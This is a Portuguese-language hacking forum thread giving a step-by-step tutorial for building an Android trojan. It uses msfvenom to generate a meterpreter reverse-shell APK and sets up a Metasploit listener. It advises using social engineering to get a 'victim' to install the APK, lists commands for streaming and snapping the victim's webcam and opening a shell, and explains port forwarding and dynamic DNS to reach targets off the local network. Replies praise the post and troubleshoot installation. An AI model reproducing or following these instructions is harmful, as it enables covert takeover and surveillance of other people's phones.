Welcome to Shadow Network

Seja bem-vindo ao nosso fórum, registre-se para poder interagir em nosso fórum

tomz

[MALWARE]
Invasão android com payload [Conexão reversa]

8 posts neste tópico

Salve,

Como criar um Trojan para invadir um Android.

Abra seu terminal, digite o seguinte comando: msfvenom -p android/meterpreter/reverse_tcp LHOST=SEUIP LPORT=PORTA_USADA_PARA_CONEXÃO R > /root/Desktop/NOMEDOAPK.apk

tumblr_oibaitIxYc1runbmbo1_1280.png

Confira o comando, e execute.

tumblr_oibal7qDV31runbmbo1_1280.png

Irá criar um arquivo com extensão APK na area de trabalho da sua máquina.

ATENÇÃO

Antes de mandar isso pra pessoa (Sim, você tem que fazer ela instalar o aplicativo no celular dela para funcionar, lembrando que como é um aplicativo desconhecido, você com sua engenharia social, terá que dizer pra ela liberar a instalação de aplicativo de terceiros: Configurações -> Segurança -> Fontes Desconhecidas "Permitir a instalação de aplicativos de fontes desconhecidas.")

Abra um novo terminal (Ctrl+Shift+n) e execute esses comandos:

Digite: msfconsole 

tumblr_oib9cjWZyM1runbmbo1_1280.png

Agora execute esses comandos(um de cada vez):

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost SEU_IP

set lport A_PORTA_USADA

exploit

Ficará mais ou menos assim:

tumblr_oib9ncZLWq1runbmbo1_1280.png

Quando o terminal estiver semelhante à screenshot, é porque está esperando a pessoa instalar o aplicativo. Assim que instalar irá estabelecer a conexão. 

Obs: você deve executar os comandos no MSFCONSOLE antes de mandar a pessoa instalar e abrir.

Quando estabelecer a conexão entre você e a "vítima" ficará mais ou menos assim:

tumblr_oiba4954pr1runbmbo1_1280.png

Nesse caso você já está dentro do Android da pessoa, para saber os comandos digite : ?.

ALGUNS COMANDOS

webcam_list: lista as webcams que tem.

webcam_stream: streama a webcam da pessoa.

webcam_snap: tira um print da webcam da pessoa.

shell: entra no dos do android

----- LEIA -----

Pra você conseguir uma conexão com quem não está na sua rede (wifi por exemplo) você vai ter que:

Abrir a porta usada (no meu caso foi a 4444) do seu modem PELO KALI, e criar um dns dinâmico (use o site www.noip.com pra isso).

Valeu galera, deixe sua crítica :')

Tomz

4

Compartilhar este post

Link para o post
Compartilhar em outros sites

Muito bom, ótimo tutorial ! Pelo  msfvenom metasploit, da pra criar também para o linux e outros, recomendo ! Não queiram criar apk para colocar no fórum, poderá sofrer sérios danos kk

1

Compartilhar este post

Link para o post

Caralho maluco ! Tópico muito bem feito de qualidade up parabéns !

0

Compartilhar este post

Link para o post

aqui quando eu tento instalar o arquivo no meu cel diz q n da p instalar, e eu ja marquei a opção de permitir instalações de arquivos "estranhos" e tal

0

Compartilhar este post

Link para o post
Em 29/12/2016 at 9:50 PM, |MR J4X| disse:

aqui quando eu tento instalar o arquivo no meu cel diz q n da p instalar, e eu ja marquei a opção de permitir instalações de arquivos "estranhos" e tal

Pode ser que a versão do Android não seja compatível com o aplicativo criado pelo msfvenom, meu android do celular 4.2.2 não funcionou também!

0

Compartilhar este post

Link para o post

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora

Shadow Network

Seja Bem-Vindo ao nosso fórum, construído com o intuito de compartilhar idéias e conhecimentos ao alcance de qualquer pessoa que tenha vontade de aprender.

Atencao

Em caso de bugs/erros no forum, entre em contato com algum membro da equipe.